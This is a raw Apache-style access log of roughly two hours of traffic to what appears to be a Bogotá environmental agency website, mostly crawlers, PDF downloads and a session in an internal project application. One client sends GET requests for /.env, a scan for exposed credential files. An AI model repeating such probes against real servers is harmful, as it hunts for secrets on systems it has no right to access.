186.28.189.55 - - [20/Mar/2022:18:51:57 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 290979
186.28.189.55 - - [20/Mar/2022:18:52:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1169.pdf HTTP/1.1" 200 551038
207.46.13.209 - - [20/Mar/2022:18:55:40 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [20/Mar/2022:18:55:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115787
216.245.221.92 - - [20/Mar/2022:18:56:13 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.218 - - [20/Mar/2022:18:57:50 -0500] "GET /bla/resoluciones/resoluciones%202014/2297.pdf HTTP/1.1" 200 4088240
173.252.107.12 - - [20/Mar/2022:18:58:37 -0500] "GET /images/operativo-licencias-ambientales-5-noviembre%20.jpg HTTP/1.1" 200 38992
207.46.13.43 - - [20/Mar/2022:18:59:57 -0500] "GET /bla/resoluciones/resoluciones%202018/4107.pdf HTTP/1.1" 200 332527
40.77.189.132 - - [20/Mar/2022:19:00:54 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
216.245.221.92 - - [20/Mar/2022:19:01:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:19:01:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115787
173.252.95.23 - - [20/Mar/2022:19:05:03 -0500] "GET /alcaldesa-claudia-lopez-sembro-el-arbol-numero-100-mil-de-su-administracion.html HTTP/1.1" 206 1031
173.252.95.6 - - [20/Mar/2022:19:05:03 -0500] "GET /alcaldesa-claudia-lopez-sembro-el-arbol-numero-100-mil-de-su-administracion.html HTTP/1.1" 206 1031
34.141.150.111 - - [20/Mar/2022:19:05:32 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [20/Mar/2022:19:06:13 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.218 - - [20/Mar/2022:19:07:21 -0500] "GET /bla/resoluciones/resoluciones%202014/0133.pdf HTTP/1.1" 200 835726
190.156.90.221 - - [20/Mar/2022:19:08:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/3933.pdf HTTP/1.1" 200 364115
207.46.13.157 - - [20/Mar/2022:19:10:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/3933.pdf HTTP/1.1" 200 364115
66.249.73.97 - - [20/Mar/2022:19:11:03 -0500] "-" 408 -
216.245.221.92 - - [20/Mar/2022:19:11:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:19:12:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115796
2.58.149.173 - - [20/Mar/2022:19:15:03 -0500] "GET /.env HTTP/1.1" 404 1049
2.58.149.173 - - [20/Mar/2022:19:15:03 -0500] "GET /.env HTTP/1.1" 404 1043
2.58.149.173 - - [20/Mar/2022:19:15:03 -0500] "POST / HTTP/1.1" 200 319
2.58.149.173 - - [20/Mar/2022:19:15:03 -0500] "POST / HTTP/1.1" 200 319
199.59.150.183 - - [20/Mar/2022:19:15:46 -0500] "-" 408 -
216.245.221.92 - - [20/Mar/2022:19:16:13 -0500] "HEAD / HTTP/1.1" 200 -
173.252.95.1 - - [20/Mar/2022:19:17:33 -0500] "GET /images/humedal-agua-lluvias-bogota-18-marzo.jpg HTTP/1.1" 200 146923
221.3.133.87 - - [20/Mar/2022:19:18:19 -0500] "GET / HTTP/1.1" 200 4720
207.46.13.209 - - [20/Mar/2022:19:19:00 -0500] "GET /BLA/boletinlegal/doctrina.php HTTP/1.1" 200 5604
157.55.39.218 - - [20/Mar/2022:19:19:11 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
207.46.13.43 - - [20/Mar/2022:19:19:17 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
207.46.13.43 - - [20/Mar/2022:19:19:19 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
207.46.13.43 - - [20/Mar/2022:19:19:22 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
40.77.167.46 - - [20/Mar/2022:19:19:25 -0500] "GET /bla/resoluciones/resoluciones%202014/2461.pdf HTTP/1.1" 200 676575
201.245.192.253 - - [20/Mar/2022:19:20:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45930
216.245.221.92 - - [20/Mar/2022:19:21:13 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.101 - - [20/Mar/2022:19:21:44 -0500] "-" 408 -
201.245.192.253 - - [20/Mar/2022:19:21:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45811
181.61.209.191 - - [20/Mar/2022:19:21:58 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [20/Mar/2022:19:22:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115796
181.237.45.189 - - [20/Mar/2022:19:24:42 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [20/Mar/2022:19:26:13 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.157 - - [20/Mar/2022:19:31:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1108.pdf HTTP/1.1" 200 451285
201.245.192.253 - - [20/Mar/2022:19:30:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45930
216.245.221.92 - - [20/Mar/2022:19:31:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:19:31:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45811
66.249.73.100 - - [20/Mar/2022:19:32:24 -0500] "-" 408 -
201.245.192.253 - - [20/Mar/2022:19:31:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115796
40.77.190.44 - - [20/Mar/2022:19:35:09 -0500] "GET /BLA/boletinlegal/js/ajax_doctrina.js HTTP/1.1" 200 772
173.252.95.16 - - [20/Mar/2022:19:36:09 -0500] "GET /30-tinguas-azules-volvieron-a-alzar-vuelo-en-el-humedal-jaboque-en-engativa.html HTTP/1.1" 206 1102
173.252.95.5 - - [20/Mar/2022:19:36:10 -0500] "GET /30-tinguas-azules-volvieron-a-alzar-vuelo-en-el-humedal-jaboque-en-engativa.html HTTP/1.1" 206 1102
173.252.95.22 - - [20/Mar/2022:19:36:10 -0500] "GET /30-tinguas-azules-volvieron-a-alzar-vuelo-en-el-humedal-jaboque-en-engativa.html HTTP/1.1" 206 1102
173.252.95.11 - - [20/Mar/2022:19:36:10 -0500] "GET /30-tinguas-azules-volvieron-a-alzar-vuelo-en-el-humedal-jaboque-en-engativa.html HTTP/1.1" 206 1102
173.252.95.5 - - [20/Mar/2022:19:36:10 -0500] "GET /30-tinguas-azules-volvieron-a-alzar-vuelo-en-el-humedal-jaboque-en-engativa.html HTTP/1.1" 206 1102
173.252.95.8 - - [20/Mar/2022:19:36:10 -0500] "GET /30-tinguas-azules-volvieron-a-alzar-vuelo-en-el-humedal-jaboque-en-engativa.html HTTP/1.1" 206 1102
173.252.95.116 - - [20/Mar/2022:19:36:10 -0500] "GET /30-tinguas-azules-volvieron-a-alzar-vuelo-en-el-humedal-jaboque-en-engativa.html HTTP/1.1" 206 1102
173.252.95.24 - - [20/Mar/2022:19:36:10 -0500] "GET /30-tinguas-azules-volvieron-a-alzar-vuelo-en-el-humedal-jaboque-en-engativa.html HTTP/1.1" 206 1102
173.252.95.16 - - [20/Mar/2022:19:36:10 -0500] "GET /30-tinguas-azules-volvieron-a-alzar-vuelo-en-el-humedal-jaboque-en-engativa.html HTTP/1.1" 206 1102
173.252.95.3 - - [20/Mar/2022:19:36:11 -0500] "GET /images/liberacion-tinguas-azul-humedal-jaboque-fotoprincipal-26-enero.jpg HTTP/1.1" 200 80757
216.245.221.92 - - [20/Mar/2022:19:36:13 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [20/Mar/2022:19:38:38 -0500] "-" 408 -
221.2.155.199 - - [20/Mar/2022:19:39:11 -0500] "GET / HTTP/1.0" 200 319
40.77.167.46 - - [20/Mar/2022:19:39:45 -0500] "GET /bla/resoluciones/resoluciones%202021/2400.pdf HTTP/1.1" 200 607587
201.245.192.253 - - [20/Mar/2022:19:40:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45930
216.245.221.92 - - [20/Mar/2022:19:41:13 -0500] "HEAD / HTTP/1.1" 200 -
31.13.115.14 - - [20/Mar/2022:19:41:28 -0500] "GET /mas-de-70-animales-silvestres-regresaron-a-la-libertad-en-el-humedal-juan-amarillo.html?fbclid=IwAR0ghE8O_Sdm7Ks8gxUa3RAuwiZELWIRnRAn221gyxli7dvSb5s3lwKJvjA HTTP/1.1" 200 958
157.55.39.218 - - [20/Mar/2022:19:41:44 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 290979
201.245.192.253 - - [20/Mar/2022:19:41:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45811
201.245.192.253 - - [20/Mar/2022:19:42:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115796
201.244.192.240 - - [20/Mar/2022:19:45:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%20CONJUNTAS/Resolucion%20conjunta%20No.%20001-2017.pdf HTTP/1.1" 200 332456
181.58.184.241 - - [20/Mar/2022:19:45:11 -0500] "GET /humedales-por-que-son-importantes-en-epoca-de-lluvia.html HTTP/1.1" 200 793
201.244.192.240 - - [20/Mar/2022:19:45:15 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
66.249.73.127 - - [20/Mar/2022:19:45:23 -0500] "-" 408 -
216.245.221.92 - - [20/Mar/2022:19:46:13 -0500] "HEAD / HTTP/1.1" 200 -
216.245.221.92 - - [20/Mar/2022:19:51:13 -0500] "HEAD / HTTP/1.1" 200 -
181.59.216.151 - - [20/Mar/2022:19:52:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5262.pdf HTTP/1.1" 200 370932
181.59.216.151 - - [20/Mar/2022:19:52:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5262.pdf HTTP/1.1" 200 370932
181.59.216.151 - - [20/Mar/2022:19:52:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5262.pdf HTTP/1.1" 206 1025
181.59.216.151 - - [20/Mar/2022:19:52:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5262.pdf HTTP/1.1" 206 1
181.59.216.151 - - [20/Mar/2022:19:52:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5262.pdf HTTP/1.1" 206 368284
66.249.73.127 - - [20/Mar/2022:19:52:53 -0500] "-" 408 -
181.59.216.151 - - [20/Mar/2022:19:52:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5262.pdf HTTP/1.1" 200 370932
181.59.216.151 - - [20/Mar/2022:19:54:08 -0500] "GET /si-usted-o-su-negocio-es-generador-de-residuos-hospitalarios-o-similares-debera-inscribirse-ante-la-secretaria-de-ambiente.html HTTP/1.1" 200 1117
201.245.192.253 - - [20/Mar/2022:19:54:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115796
216.245.221.92 - - [20/Mar/2022:19:56:13 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.43 - - [20/Mar/2022:19:59:42 -0500] "GET /bla/resoluciones/resoluciones%202014/3136.pdf HTTP/1.1" 200 490687
216.245.221.92 - - [20/Mar/2022:20:01:13 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.43 - - [20/Mar/2022:20:03:22 -0500] "GET /bla/resoluciones/resoluciones%202014/2999.pdf HTTP/1.1" 200 1070748
201.245.192.253 - - [20/Mar/2022:20:02:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
191.95.175.6 - - [20/Mar/2022:20:03:53 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [20/Mar/2022:20:06:13 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [20/Mar/2022:20:06:53 -0500] "-" 408 -
216.245.221.92 - - [20/Mar/2022:20:11:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:20:12:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115766
216.245.221.92 - - [20/Mar/2022:20:16:13 -0500] "HEAD / HTTP/1.1" 200 -
69.171.251.12 - - [20/Mar/2022:20:18:14 -0500] "GET /images/humedal-agua-lluvias-bogota-18-marzo.jpg HTTP/1.1" 200 146923
201.245.192.253 - - [20/Mar/2022:20:20:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45626
216.245.221.92 - - [20/Mar/2022:20:21:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:20:21:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45781
40.77.167.106 - - [20/Mar/2022:20:24:58 -0500] "-" 408 -
66.249.73.127 - - [20/Mar/2022:20:25:28 -0500] "-" 408 -
216.245.221.92 - - [20/Mar/2022:20:26:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:20:25:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115766
186.0.114.144 - - [20/Mar/2022:20:27:04 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.73.97 - - [20/Mar/2022:20:28:40 -0500] "-" 408 -
207.46.13.157 - - [20/Mar/2022:20:30:37 -0500] "GET /bla/resoluciones/resoluciones%202021/2892.pdf HTTP/1.1" 200 935392
201.245.192.253 - - [20/Mar/2022:20:30:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45626
216.245.221.92 - - [20/Mar/2022:20:31:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2022:20:31:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45781
201.245.192.253 - - [20/Mar/2022:20:32:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115766
66.249.73.127 - - [20/Mar/2022:20:34:18 -0500] "-" 408 -
201.221.172.175 - - [20/Mar/2022:20:34:57 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
201.245.192.253 - - [20/Mar/2022:20:35:12 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [20/Mar/2022:20:35:12 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:12 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12179
201.245.192.253 - - [20/Mar/2022:20:35:12 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
201.245.192.253 - - [20/Mar/2022:20:35:12 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
201.245.192.253 - - [20/Mar/2022:20:35:12 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
201.245.192.253 - - [20/Mar/2022:20:35:12 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:12 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
201.245.192.253 - - [20/Mar/2022:20:35:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:12 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
201.245.192.253 - - [20/Mar/2022:20:35:12 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
201.245.192.253 - - [20/Mar/2022:20:35:12 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:22 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 11165
201.245.192.253 - - [20/Mar/2022:20:35:22 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
201.245.192.253 - - [20/Mar/2022:20:35:22 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:22 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:25 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 5600
201.245.192.253 - - [20/Mar/2022:20:35:26 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 17459
201.245.192.253 - - [20/Mar/2022:20:35:26 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:26 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
201.245.192.253 - - [20/Mar/2022:20:35:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:26 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
201.245.192.253 - - [20/Mar/2022:20:35:26 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
201.245.192.253 - - [20/Mar/2022:20:35:26 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
201.245.192.253 - - [20/Mar/2022:20:35:29 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:29 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2055
201.245.192.253 - - [20/Mar/2022:20:35:30 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 81584
201.245.192.253 - - [20/Mar/2022:20:35:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:32 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:38 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 163
201.245.192.253 - - [20/Mar/2022:20:35:38 -0500] "GET /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 88460
201.245.192.253 - - [20/Mar/2022:20:35:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:39 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:39 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3261
201.245.192.253 - - [20/Mar/2022:20:35:46 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 44649
201.245.192.253 - - [20/Mar/2022:20:35:46 -0500] "GET /sipse/faces/javax.faces.resource/spacer/dot_clear.gif?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:46 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3950
201.245.192.253 - - [20/Mar/2022:20:35:52 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 95022
201.245.192.253 - - [20/Mar/2022:20:35:52 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:35:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:36:01 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/presupuesto/presupuestoEntreActividades/seleccionarActividadesOrigen.xhtml HTTP/1.1" 200 68129
201.245.192.253 - - [20/Mar/2022:20:36:01 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:36:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:36:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:36:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:36:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:36:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:36:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [20/Mar/2022:20:36:01 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3417
201.245.192.253 - - [20/Mar/2022:20:36:04 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 44689
201.245.192.253 - - [20/Mar/2022:20:36:05 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 4002
216.245.221.92 - - [20/Mar/2022:20:36:13 -0500] "HEAD / HTTP/1.1" 200 -
186.28.17.184 - - [20/Mar/2022:20:37:58 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.28.17.184 - - [20/Mar/2022:20:37:58 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
186.28.17.184 - - [20/Mar/2022:20:37:58 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
186.28.17.184 - - [20/Mar/2022:20:37:58 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
186.28.17.184 - - [20/Mar/2022:20:37:58 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.28.17.184 - - [20/Mar/2022:20:38:01 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
186.28.17.184 - - [20/Mar/2022:20:38:01 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
186.28.17.184 - - [20/Mar/2022:20:38:01 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
186.28.17.184 - - [20/Mar/2022:20:38:00 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2016%2F HTTP/1.1" 200 163824
186.28.17.184 - - [20/Mar/2022:20:38:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1528.pdf HTTP/1.1" 200 3324108
201.245.192.253 - - [20/Mar/2022:20:40:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45626
216.245.221.92 - - [20/Mar/2022:20:41:13 -0500] "HEAD / HTTP/1.1" 200 -
